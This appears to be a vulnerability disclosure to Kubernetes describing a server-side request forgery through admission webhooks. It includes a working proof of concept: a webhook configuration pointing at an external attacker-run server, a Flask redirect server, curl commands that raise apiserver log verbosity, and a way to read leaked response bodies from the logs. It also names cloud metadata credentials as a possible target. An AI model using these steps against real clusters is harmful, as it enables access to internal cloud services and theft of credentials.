Kubernetes: SSRF for kube-apiserver cloudprovider scene

Report Submission Form

Summary:

attacker can create admissionwebhook cause ssrf in cloudprovider server.
cloudprovider like GKE AKS EKS.

Kubernetes Version:

kubernetes v1.18.6

Component Version:

Docker version 19.03.6, build 369ce74a3c

Steps To Reproduce:

1. use follwing command create v1.18.6 kubernetes, wait for the download process done.

minikube start --vm-driver=none --kubernetes-version='v1.18.6'

2.edit kube-apiserver options in following path.

/etc/kubernetes/manifests/kube-apiserver.yaml

add some options to  spec.containers.command field.  see pic1
--log-dir=/var/log
--logtostderr=false

{F920720}

3.save following yaml file to disk as poc1.yaml, and run command kubectl create poc1.yaml.

poc1.yaml

apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: test.config.xxx.io
webhooks:
- name: test.config.xxx.io
  rules:
  - apiGroups:   [""]
    apiVersions: ["v1", "v1beta1"]
    operations:  ["CREATE","DELETE","UPDATE"]
    resources:   ["serviceaccounts"]
    scope:       "*"
  clientConfig:
    # modify with your poc2 webserver
    url: "https://lazydog.me/aa"
    # if webserver using self-signed certificate must be add caBundle
    # caBundle: ""
  admissionReviewVersions: ["v1", "v1beta1"]
  sideEffects: None
  timeoutSeconds: 5

4.use pip install Flask to install flask deps, and run FLASK_ENV=development FLASK_APP=poc1 flask run. if you using self-signed certificate must be add --cert PATH --key PATH arguments to command.

poc2.py

from flask import Flask, redirect, request, Response

app = Flask(__name__)

app.port = 80


@app.route('/<path:path>', methods=['POST','GET'])
def index(path=''):
    resp = ''
    print(request.headers)
    if path == 'test':
        res = Response("test")
        res.headers["Content-Type"] = "application/vnd.kubernetes.protobuf"
        return res

    return redirect('http://www.tencent.com/')

5.use kubectl proxy & start a apiserver proxy to localhost,and set klog level to 10. if not set klog level to 10 is can only recv http failed code response body.

curl -XPUT --data "10" http://localhost:8001/debug/flags/v

6.now we can create a serviceaccount let apiserver to request our evil webserver use this command kubectl create sa testpoc.

{F920762}

7.use curl http://localhost:8001/logs/kube-apiserver.INFO to find full response body, is may be include Response Body: strings.

{F920768}

Supporting Material/References:

• klog set to 10 root cause. https://github.com/kubernetes/client-go/blob/31e286ee1926a84e0bfd4c8c8c77b3816f98244a/rest/request.go#L1072
• This link let our know gke is enabled logs handler https://groups.google.com/g/kubernetes-users/c/gHHhl0hI7GU

Impact

I think this case is like CVE-2020–8555, attacker can cause a full response body ssrf in cloudprovider inner server.

if redirect url is metadata server maybe can leak some credentials or other sensitive information.